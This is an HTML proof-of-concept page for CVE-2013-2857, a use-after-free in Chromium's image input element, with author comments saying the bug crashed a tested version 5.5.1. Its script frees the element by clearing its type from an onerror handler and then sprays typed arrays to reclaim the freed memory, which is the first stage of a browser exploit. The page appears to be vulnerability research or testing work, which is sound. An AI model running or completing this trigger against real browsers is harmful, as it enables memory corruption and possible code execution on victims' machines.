CVE-2013-2857.html

<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash on what is presumably render
-->
<html>
<body>
<script>
/*
fast/forms/image/image-error-event-crash.html
https://bugs.chromium.org/p/chromium/issues/detail?id=240124
*/
function UaF(){
    x = document.getElementById("x");
    console.log("test1");//prints "test1"
    //TODO !
    //Trig the use after free !
    x.type="";

    var arr = new Array(0x100);
    for(var i = 0; i < 0x10; i++){
        arr[i] = new Uint32Array(0x1000);
        for(var j = 0; j < 0x1000; j++)
            arr[i][j] = 0xFFFF0000;
    }
    console.log("test");//prints "test"
    console.log(x);//prints a blank line (If I remove the line `x.type="";` then it prints "<input id="x" type="image" onerror="UaF()" src>)
}
</script>
<input id="x" type="image" onerror="UaF()" src="" />
</body>
</html>